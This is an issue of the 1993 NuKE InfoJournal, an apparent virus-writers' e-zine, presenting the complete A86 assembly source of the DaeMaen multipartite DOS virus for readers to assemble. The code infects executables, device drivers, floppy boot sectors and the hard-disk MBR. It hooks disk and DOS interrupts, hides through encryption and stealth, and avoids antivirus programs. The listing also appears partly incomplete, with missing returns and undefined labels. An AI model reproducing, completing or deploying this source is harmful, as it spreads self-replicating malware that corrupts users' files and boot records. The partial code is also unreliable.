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NuKE Issue 07-008
uK E-
E- "The DaeMaen Virus Source Code" Nu
-N Article By Virus By uK
uK Rock Steady TaLoN E-
E- Nu
NuKE InfoJournal #7
August 1993
Well, here it is, the DaeMaen virus...the binary has been out for quite a
while now. Two versions of DaeMaen exist; the source code presented here
is from the first version. The changes made in the second version were
minor. You'll need to assemble this with the A86 assembler. It is *not*
compatible with MASM or TASM due to some minor directive differences, but
it can easily be modified to compiler under the more popular assemblers
(we chose to present to you the original, untouched source code, straight
from the author).
It is an extremely nice piece of work, only 2k in size, quite tight for
all that code (it does .COM, .EXE, .SYS, .BIN, .OVL, and boot sector
infections). However it is somewhat lacking: some methods of infection
are somewhat lacking, and I'm not too thrilled about the technique of
infecting on file closes. Nevertheless, I find it extrordinary learning
Rock Steady/NuKE
[Note: TaLoN aka Terminator-Z is no longer with NuKE due to legal problems.
After being investigated by Australian authorities for illegal activities
totally unconnected to his role in NuKE, he decided to take the heat off
himself by "turning in" members of NuKE for crimes that they never committed.
It is sad to see such a fine programmer do something so dispicable and
underhanded, and we at NuKE regret his decision. We wish him all the best
in the courts... -NM]
-------------------------------- CUT HERE -------------------------------------
; DeMn Virus specifications:
; An extrodinary virus if we may say so. It is able to infect .COMs, .EXEs,
; .SYSs, .BINs, .OVLs, Floppy Boot Sectors, HD Master Boot Records.
; Infects files on executions, opens, ext opens, attribs, close & renames.
; Infected files will feature a simple Random key encryption routine.
; Stealth abilities range from, redirects read/write away from partition table
; "Dir", hides file size increase without CHKDSK fuckups
; Memory stealth, memory disappears from DOS's view without function calls
; -January 28, 1993 -TaLoN
org 0
@tsrchk equ 0a7ceh ; fingerprint
@mbr equ 9 ; sector of original MBR
@com_exe equ 0
@sys equ 1
@JO equ 070h ; JO operand for variable branch
@JMPS equ 0ebh ; JMP SHORT (as above)
@RET equ 0c3h ; RET for encrypt shit
p_len equ 3072/16 ; 3k in paragraphs
syshead db 18 dup 90h ; header for SYS infection
push ax
push cx
push si
push ds
push bp
call encr_decr
e_start: cld
call $+3
pop si
sub si, $-1
mov bp, es
branch: jo sys_entry
com_exe_entry: add sp, 10 ; fuck off other registers
call chk
jz get_lost
jmp domem
pre_gl: xor si, si
get_lost: mov es, bp ; exit without fingerprints
push cs
pop ds
add si, offset old_shit
gl: jo exit_exe
mov di, 0100h
push bp
push di
jmp short zero_shit
exit_exe: add bp, 10h
add ax, bp
xchg ax, bx
mov ss, bx
xchg ax, sp
xchg ax, bx
add ax, bp
push ax
push bx
sub bp, 10h
zero_shit: xor ax, ax ; clean our hands
mov bx, ax
mov cx, ax
mov dx, ax
mov si, ax
mov di, ax
mov ds, bp
mov bp, ax
retf ; I didn't see nothin'
sys_entry: ;int 05 ; for debugger
mov ax, word ptr [si+old_shit]
mov word ptr [6], ax ; restore INTR address
push ax
push bx
push dx
push di
push es
push ax
call chk
pop ax
jz go_sys_exit
push ax
mov cx, si
push si
lea ax, [si+4096]
mov bx, 10h
xor dx, dx
div bx
inc ax ; align on paragraph boundary
mov bx, cs
add ax, bx
mov es, ax
xor si, si
xor di, di
rep movsb ; move the driver up in memory
push cs
pop es
xor di, di
mov cx, v_len
mov bx, offset sys_00
jmp move_us
go_sys_exit: jmp short sys_exit
sys_00: push ax
mov ax, cs
inc ah
mov es, ax
mov bp, ax
pop ds
xor si, si
mov di, si
pop cx
rep movsb ; move SYS to final resting place
push es
pop ds
push cs
pop es
xor si, si
mov di, si
mov cx, 9
rep movsw ; copy their header
xor si, si
push cs
pop ds
call dms ; do some hooking shit
pop ax
mov word ptr [strat_1], ax
mov word ptr [strat_1+2], bp
mov word ptr [intr_1+2], bp
mov ax, word ptr [8]
mov word ptr [intr_1], ax
mov word ptr [6], offset strat ; hehe trick DOS
mov word ptr [8], offset intr
sys_exit: pop es
pop di
pop dx
pop bx
pop ax
pop bp ; restore registers
pop ds
pop si
pop cx
pop ax
jc sys_exit_2
push word ptr cs:[6]
sys_exit_2: jmp strat
db '[DeMn] by TLN-{NKä}'
new13: ; check for floppy access
; check for hd read sector 1
cmp ax, @tsrchk
jne n13_2
xchg ax, bx
push cs
pop es
n13_2: push ax
shr ah, 1
cmp ah, 1
jne exit13
cmp dl, 80h
jb do_floppy
ja exit13
or dh, dh ; head 0?
jnz exit13
cmp cx, 1 ; sector 1?
ja exit13
pop ax
cmp ax, 0309h ; writing a few sectors?
jae e13 ; yeah.. let him
call save
push ax
mov al, 1 ; give him the "real" MBR
mov cx, @mbr
call i13
pop ax
dec al ; and read the rest of
or al, al ; what he wants
jz hd_done1
add bx, 200h
call i13
sub bx, 200h
hd_done1: call restore ; no sectors left
inc ax
xor ah, ah ; status=no error
retf 2
gorestore: call restore
exit13: pop ax
e13: jmp bypass
do_floppy: call save
xor ax, ax
mov ds, ax
inc dl
test byte ptr [43fh], dl ; drive still spinning?
jnz gorestore ; yeah, don't reinfect
dec dl
call gooknuke
call eat_floppy
jmp short gorestore
new13_2: ; the guts of multipartite infection
; check to see if i21 has changed... if so, hook it
call save
push cs
pop es
xor ax, ax
mov ds, ax
mov si, 21h*4
mov di, offset oldvect+8
je nochange
je nochange
call capture_21
push cs
pop ds
mov si, offset oldvect+0 ; copy over saved shit so that
lea di, [si+4] ; our i13 doesn't call here
movsw ; any more [i21 has been hooked]
nochange: call restore
jmp dword ptr cs:[oldvect+0]
db 'Hugs to Sara Gordon' ; get her agro
new21: ; guts
cmp ah, 11h ; FIND_FIRST
je go_kstealth
cmp ah, 12h ; FIND_NEXT
je go_kstealth
cmp ah, 3ch ; CREAT
je create
cmp ah, 3dh ; OPEN
je letsgo
cmp ah, 3eh ; CLOSE
je close
cmp ah, 43h ; ATTRIB
je letsgo
cmp ax, 4b00h ; EXEC
je letsgo
cmp ah, 56h ; RENAME
je letsgo
cmp ah, 6ch ; EXT_OPEN
jne n21_2
push dx
mov dx, si
call infect
pop dx
jmp short n21_2
letsgo: call infect
n21_2: jmp dword ptr cs:[oldvect+8]
file_end: mov ax, 4202h
jmp short seek_vals
file_zero: mov ax, 4200h
seek_vals: xor cx, cx
xor dx, dx
i21: pushf
push cs
call n21_2
go_kstealth: jmp short kstealth
create: call i21 ; go create the file
jc creat_exit ; successful?
mov word ptr cs:[handle], ax ; save handle
call save
call save_name
call restore
creat_exit: retf 2
close_r dw offset creat_exit
close: push word ptr cs:[close_r]
call i21
jc close_exit
cmp word ptr cs:[handle], bx ; the one we've got stored?
jne close_exit
call save
jmp infect_2 ; external entry
go_ce: call restore
close_exit: ret ; exit with current flagz
kstealth: ; stole some of this from Mutating Rocko, mine wouldn't
; quite work right! but I have changed it substantially..
call i21
or al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push cx
push ds
push es
mov ah,51h ;Is this Undocmented? huh...
call i21
mov es,bx
cmp bx,es:[16h]
jnz not_infected ;Not for us man...
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
call i21
pop ax
inc al
push es
pop ds
jnz fcb_okay
add bx,7h
fcb_okay: mov ax, [bx+19h]
mov cl, 9
shr ax, cl
cmp ax, 100 ; 100 years more than expected?
jb not_infected
mov cx, 1
cmp word ptr [bx+9], 'YS' ; is it a SYS file?
jne subtract
cmp byte ptr [bx+11], 'S'
jne subtract
inc cx ; take twice as much from SYS
subtract: sub word ptr [bx+1dh], v_len
sbb word ptr [bx+1fh], 0
loop subtract
not_infected: pop es
pop ds
pop cx
pop bx
pop ax
no_good: iret
infect: call save
call save_name
infect_2: call gooknuke ; DS=ES=CS
call namechk
jc go_bitch
mov byte ptr [infected], 0 ; reset date change flag
mov byte ptr [branch], @JO
mov ax, 3524h
call i21
push es
push bx
mov dx, offset no_good ; use the IRET from stealth bit
mov ax, 2524h
call i21 ; disable Critical Error Handler
push cs
pop es
mov dx, offset filename
mov ax, 4300h
call i21 ; get attribs
push cx
mov ax, 4301h
xor cx, cx
call i21
pop cx
jc go_bitch1
push cx
mov ax, 3d02h
mov dx, offset filename
call i21 ; open read/write
jc bitch2
xchg ax, bx
mov ax, 5700h
call i21
push cx
push dx
xchg ax, dx
mov cl, 9
shr ax, cl
cmp ax, 100 ; 100 years more than expected?
pop dx
pop cx
jae bitch3
push cx
push dx
mov dx, offset signature
mov ah, 3fh
mov cx, 24
call i21 ; load header
xor ax, cx ; file too small?
jnz bitch4
mov si, dx
cmp al, 'M'
je goexe ; it's an EXE
cmp al, 'Z'
je goexe
cmp byte ptr [itype], @sys ; is it a SYS file?
je gosys
jmp short gocom
go_bitch: jmp short bitch
go_bitch1: jmp short bitch1
bitch4: pop dx
pop cx
cmp byte ptr [infected], 0 ; has the file been infected?
je set4
add dh, 0c8h ; add 100 years to date
set4: mov ax, 5701h
call i21
bitch3: mov ah, 3eh
call i21 ; close file
bitch2: push cs
pop ds
pop cx
mov ax, 4301h
mov dx, offset filename
call i21 ; reset attribs
bitch1: pop dx
pop ds
mov ax, 2524h
call i21
bitch: call restore
goexe: call exeinf
jmp short bitch4
gocom: call cominf
jmp short bitch4
gosys: call sysinf
jmp short bitch4
cominf: mov di, offset old_shit
movsw ; save first 3 bytes
call file_end
or dx, dx
jnz com_done
cmp ax, 0f000h ; COM too big?
jae com_done
add ax, 15 ; bypass SYS fill
push ax
mov byte ptr [gl], @JO
call write_us
mov di, offset signature
mov al, 0e9h
pop ax
jmp write_head
com_done: ret
db 'Hey John! If this is bad, wait for [VCL20]!'
exeinf: call file_end
push ax ; check for internal overlays
push dx
mov ax, word ptr [page_cnt]
mov cx, 512
mul cx
pop cx
pop bp
cmp ax, bp
jb com_done
cmp dx, cx
jb com_done
mov di, offset old_shit
mov si, offset relo_ss
movsw ; save the old shit
call file_end
mov byte ptr [gl], @JMPS
mov cx, 10h ; # of paragraphs in whole file
div cx
sub ax, word ptr [hdr_size] ; except the header
mov word ptr [relo_cs], ax
add dx, 18 ; skip SYS fill
mov word ptr [exe_ip], dx
add dx, offset vstack+32 ; set up a stack
mov word ptr [exe_sp], dx
mov word ptr [relo_ss], ax
call write_us
mov cx, 512 ; calculate new # of code pages
div cx
or dx, dx ; any bits left over?
jz fp2
inc ax ; yes, inc # pages to accommodate
fp2: mov word ptr [part_page], dx
mov word ptr [page_cnt], ax
jmp write_head
sysinf: dec si
or ax, ax ; we'll only do files
jz sys_ok ; starting with 0000 or FFFF
inc ax ; (this excludes CONFIG.SYS)
jz sys_ok
sys_ok: mov si, offset signature+6
mov di, offset old_shit
movsw ; save old INTR offset
call file_end
add ax, 18 ; skip SYS header shit
mov word ptr [si-2], ax
mov byte ptr [branch], @JMPS
call write_us
xor cx, cx
mov dx, v_len ; file size increase = v_len*2
mov ax, 4201h
call i21
mov ah, 40h
call i21 ; write 0 bytes
; (extend file to pointer)
write_head: call file_zero
mov dx, offset signature
mov cx, 24
mov ah, 40h
call i21 ; write the header
mov byte ptr [infected], 1
eat_hd: ; infect HD partition table
; assumes DS=ES=CS
mov ax, 0201h
mov bx, offset signature
mov cx, 1
mov dx, 80h
call i13
cmp word ptr [signature+2], @tsrchk
je hd_done
mov cx, @mbr ; sector 9
mov ah, 3
call i13
mov di, bx
mov word ptr [drv+1], 80h
mov word ptr [sec+1], @mbr ; original MBR
mov si, offset kmart_kode
mov cx, k_len
rep movsb
inc cx
mov ah, 3
mov byte ptr [residence], 1
call i13
mov ax, 0304h
xor bx, bx
mov cx, 10
call i13
hd_done: ret
eat_floppy: ; do boot sector
mov ax, 0201h
mov bx, offset boot_sect
mov cx, 1 ; track 0 sector 1
xor dh, dh ; head 0
call i13
lea si, [bx+3]
mov cx, 8
kloop1: lodsb
cmp al, ' '
jb nope
cmp al, 'z'
ja nope
loop kloop1
; more complex than need be, to allow for old formats as well as new formats..
; it will check to see if it will cross a track boundary; if so, then it won't
; infect the disk.
call calcsect
push cx
sub word ptr [totsecs], 5
call calcsect
pop ax
sub ax, cx ; overrun track boundary?
add al, 4
jnz nope
push dx
xor dl, dl
mov word ptr [drv+1], dx ; drive 0.. on boot remember
mov word ptr [sec+1], cx
mov ax, 0301h
mov bx, offset boot_sect
pop dx
call i13 ; write it
jc nope
mov word ptr [oem+6], @tsrchk ; fuck it up a bit
; so we don't reinfect it later
inc cx
mov ax, 0304h ; write virus code [4 sectors]
xor bx, bx
mov byte ptr [residence], 0
call i13 ; write ourselves
mov di, offset boot_sect
push di
mov ax, 034ebh
add di, 34h
mov si, offset kmart_kode
mov cx, k_len
rep movsb ; patch boot sector
pop bx
inc cx
mov ax, 0301h
xor dh, dh
call i13 ; write patched boot sector
nope: ret
calcsect: push dx
mov ax, word ptr [totsecs] ; calculate track, head, sector
; add ax, word ptr [hidnsecs] ; of last sector
xor dx, dx
div word ptr [trksecs]
mov cx, dx
xor dx, dx
div word ptr [headcnt]
pop bx
mov bh, dl
push bx
push cx ; remainder sectors
mov cl, 6 ; CH=track
shl ah, cl
pop cx
add cl, ah ; bits 9 & 10 of track #
mov ch, al ; sector
pop dx
save_name: push cs
pop es
mov di, offset filename
push di
mov si, dx
storename: lodsb
or al, al
jnz storename
pop dx ; DS:DX = filename
push cs
pop ds
namechk: mov si, offset filename
nc1: lodsb
or al, al
jnz nc1
mov dx, si
sub dx, 4
sub si, 12
cmp si, offset filename
jae McAssFuck
mov si, offset filename
McAssFuck: dec si ; check for McWanker's
cmp si, dx ; ]<o0L WaReZ
je not_McWanker
call chkMcAsshole
je ncexit_err
loop McAssFuck
not_McWanker: mov di, offset exts ; valid extensions
mov cx, 5
and ax, 0dfdfh ; -> uppercase
extchk: scasw
je extchk_2
inc di
loop extchk
ncexit_err: stc ; nope
extchk_2: lodsb
and al, 0dfh
jne ncexit_err
mov byte ptr [itype], @com_exe
cmp di, offset residence
jb ncexit
mov byte ptr [itype], @sys ; OK, it's a SYS file
ncexit: clc
chkMcAsshole: and ax, 0dfdfh
cmp ax, 'CS' ; SCAN?
je chkma_end
cmp ax, 'LC' ; CLEAN?
je chkma_end
cmp ax, 'SV' ; VSHIELD?
je chkma_end
cmp ax, '-F' ; F-PROT?
chkma_end: ret
db 'For Dudley'
domem: mov bx, offset pre_gl
push bx
mov ax, bp
dec ax
memloop: mov ds, ax
cmp byte ptr [0], 'Z'
je fixmem
mov bx, ax ; keep previous block
add ax, word ptr [3] ; up to next MCB
inc ax
jmp short memloop
fixmem: cmp word ptr [3], p_len*5 ; is block too small?
jae fm_ok
mov ds, bx ; yeah, use previous block
xchg ax, bx
fm_ok: sub word ptr [3], p_len
add ax, word ptr [3]
inc ax
mov word ptr [12h], ax
mov es, ax
xor ax, ax
mov ds, ax
sub word ptr [413h], 3 ; TOM=TOM-3 (not necessary)
push cs
pop ds
xor di, di
mov cx, v_len
rep movsb
gohi: push es
mov ax, offset dms ; dms = Do More Shit
push ax
dms: mov ax, 70h
mov ds, ax
mov si, 1
scan: dec si
cmp ax, 1effh ; CS segment override qualifier?
jne scan
mov ax, 2cah ; RETF 2 opcode
cmp [si+4], ax ; (double check)
je right
cmp [si+5],ax
jne scan ; nope, try again
right: lodsw ; get the actual storage address
xchg ax, si
push si
mov di, offset oldvect+4
movsw ; save the original i21 vector
pop si
mov word ptr [si], offset go_n13
mov word ptr [si+2], cs
do13_2: push cs
pop ds
mov dx, 80h
call eat_hd
jnc go_ints ; hard drive infect fucked up?
xor dx, dx ; yep, infect floppy instead
call eat_floppy
go_ints: call enable
xor ax, ax
mov ds, ax
call capture_21
push cs
pop ds
db '[VCL20]'
write_us: call file_end
xor ax, ax
int 1ah
mov word ptr [key+1], dx
mov di, offset eret
mov cx, wheelchair_len
mov si, offset wheelchair
rep movsb ; move the temporary code
mov byte ptr [go_n13], @JMPS ; bypass new13
call encr_decr
call enable ; and re-enable it
call file_end
; this wheelchair stuff is probably the most dodgey code in the whole virus...
wheelchair: mov byte ptr [eret], @RET ; repair the code
mov ah, 40h
mov cx, v_len
xor dx, dx
call dword ptr cs:[oldvect+8] ; write encrypted bitch
mov ax, offset encr_decr
call ax ; now decrypt ourselves! [hehe]
wheelchair_len equ $-wheelchair ; length of temp code
capture_13: mov di, offset oldvect+4
mov ax, offset go_n13
capture_13_2: mov si, 13h*4
xor dx, dx
mov ds, dx
call doint
capture_21: mov si, 21h*4
mov di, offset oldvect+8
mov ax, offset new21
call doint
doint: mov cx, 2
d2: xchg [si], ax
lodsw ; inc si by 2
mov ax, cs
loop d2
i13: pushf ; simulate int 13h
push cs
call bypass
enable: mov byte ptr [go_n13], @JO ; restore jump to new13
save: pop word ptr cs:[temp_jmp] ; preserve registers
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
jmp word ptr cs:[temp_jmp]
restore: pop word ptr cs:[temp_jmp] ; and give them back
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp word ptr cs:[temp_jmp]
gooknuke: push cs
pop ds
push cs
pop es
kmart_kode: jmp short kkk3
dw @tsrchk ; infection marker
kkk3: cli
xor ax, ax
mov ss, ax
mov sp, 7c00h
mov ds, ax
sec: mov cx, 0
drv: mov dx, 0
push dx
ffq: push cx
call chk
jz go69
mov si, 412h
add word ptr [si+1], -3 ; take 3k
mov cl, 6
shl ax, cl
mov es, ax
xor bx, bx
mov ax, 0204h ; read us into high memory
pop cx
push cx
inc cx
int 13h
go69: push es
mov ax, offset disk_entry
push ax
chk: mov ax, @tsrchk
int 13h
xor bx, @tsrchk
k_len equ $-kmart_kode
disk_entry: call chk
jz de_exit
mov di, offset oldvect+0
mov ax, offset new13_2
call capture_13_2
call capture_13 ; make new13 jump to new13_2
mov si, 21h*4
call gooknuke
cmp byte ptr [residence], 1
je de_exit
mov dx, 80h
call eat_hd
de_exit: xor ax, ax
mov es, ax
pop cx
pop dx
mov bx, 7c00h
push es
push bx
mov ax, 0201h
int 13h
old_shit: int 20h
dw 0,0,0
exts db 'COMEXEBINOVLSYS' ; valid extensions
residence db 0 ; 0=from floppy boot
; 1=from MBR
e_end: ; end of encrypted data
strat: push ax
push ds
lds ax, dword ptr cs:[strat_1] ; trick the host driver
db 9ah
strat_1 dd 0
mov ax, word ptr [6]
mov word ptr cs:[strat_1], ax ; update pointer if changed
jmp short sys_return ; (cater for other infections)
intr: push ax
push ds
lds ax, dword ptr cs:[intr_1]
db 9ah
intr_1 dd 0
mov ax, word ptr [8]
mov word ptr cs:[intr_1], ax
sys_return: pop ds
pop ax
go_n13: jo bypass ; bypass new13 while encrypted
jmp new13
bypass: jmp dword ptr cs:[oldvect+4]
move_us: rep movsb ; this must be here in case it's
;int 05
jmp bx ; a very small SYS file, so the
; move doesn't hang the system
encr_decr: push cs
pop ds
call $+3
faewq: pop si
sub si, offset faewq - e_start
mov cx, (e_len)-1
key: mov ax, 0 ; harmless so far
dloop: xor word ptr [si], ax
inc si
inc al ; yeah wreck the key
dec ah
loop dloop
eret: ret ; this code gets changed to
; write the virus to file
; wheelchair code goes here
itype equ $+wheelchair_len
infected equ itype + 2
temp_jmp equ infected + 1
oldvect equ temp_jmp + 2 ; +0 old i13
; +4 multipartite handler
; +8 old i21
signature equ oldvect + 12
part_page equ signature + 2 ; part-page at EOF
page_cnt equ part_page + 2 ; count of code pages
hdr_size equ page_cnt + 4 ; size of header in paragraphs
relo_ss equ hdr_size + 6 ; displacement of stack segment (SS)
exe_sp equ relo_ss + 2 ; stack pointer (SP)
chksum equ exe_sp + 2 ;
exe_ip equ chksum + 2 ; instruction pointer (IP)
relo_cs equ exe_ip + 2 ; displacement of code segment (CS)
; 24 bytes
vstack equ relo_cs + 2 ; temp stack for EXE file
handle equ relo_cs + 2 ; save for file handle on Create
filename equ handle + 2 ; filename of target file
boot_sect equ relo_cs + 100 ; as not to overwrite things by accident
oem equ boot_sect + 3
sectsize equ oem + 8
clustsize equ sectsize + 2
ressecs equ clustsize + 1
fatcnt equ ressecs + 2
rootsiz equ fatcnt + 1
totsecs equ rootsiz + 2
media equ totsecs + 2
fatsize equ media + 1
trksecs equ fatsize + 2
headcnt equ trksecs + 2
hidnsecs equ headcnt + 2
v_len equ v_end - v_start
e_len equ e_end - e_start
------------------------------- CUT HERE ---------------------------------------